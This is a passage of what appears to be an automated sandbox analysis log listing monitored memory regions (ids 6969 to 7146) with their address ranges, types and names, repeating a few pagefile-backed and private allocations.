0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6969 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6970 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6971 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6972 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6973 start_va = 0x44f0000 end_va = 0x4501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6974 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6975 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6976 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6977 start_va = 0x44f0000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 6978 start_va = 0x44f0000 end_va = 0x450bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 6979 start_va = 0x4510000 end_va = 0x451dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004510000" filename = "" Region: id = 6980 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6981 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6982 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6983 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6984 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6985 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6986 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6987 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6988 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6989 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6990 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6991 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6992 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6993 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6994 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6995 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6996 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6997 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6998 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6999 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7000 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7001 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7002 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7003 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7004 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7005 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7006 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7007 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7008 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7009 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7010 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7011 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7012 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7013 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7014 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7015 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7016 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7017 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7018 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7019 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7020 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7021 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7022 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7023 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7024 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7025 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7026 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7027 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7028 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7029 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7030 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7031 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7032 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7033 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7034 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7035 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7036 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7037 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7038 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7039 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7040 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7041 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7042 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7043 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7044 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7045 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7046 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7047 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7048 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7049 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7050 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7051 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7052 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7053 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7054 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7055 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7056 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7057 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7058 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7059 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7060 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7061 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7062 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7063 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7064 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7065 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7066 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7067 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7068 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7069 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7070 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7071 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7072 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7073 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7074 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7075 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7076 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7077 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7078 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7079 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7080 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7081 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7082 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7083 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7084 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7085 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7086 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7087 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7088 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7089 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7090 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7091 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7092 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7093 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7094 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7095 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7096 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7097 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7098 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7099 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7100 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7101 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7102 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7103 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7104 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7105 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7106 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7107 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7108 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7109 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7110 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7111 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7112 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7113 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7114 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7115 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7116 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7117 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7118 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7119 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7120 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7121 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7122 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7123 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7124 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7125 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7126 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7127 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7128 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7129 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7130 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7131 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7132 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7133 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7134 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7135 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7136 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7137 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7138 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7139 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7140 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7141 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7142 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7143 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7144 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7145 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7146 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point 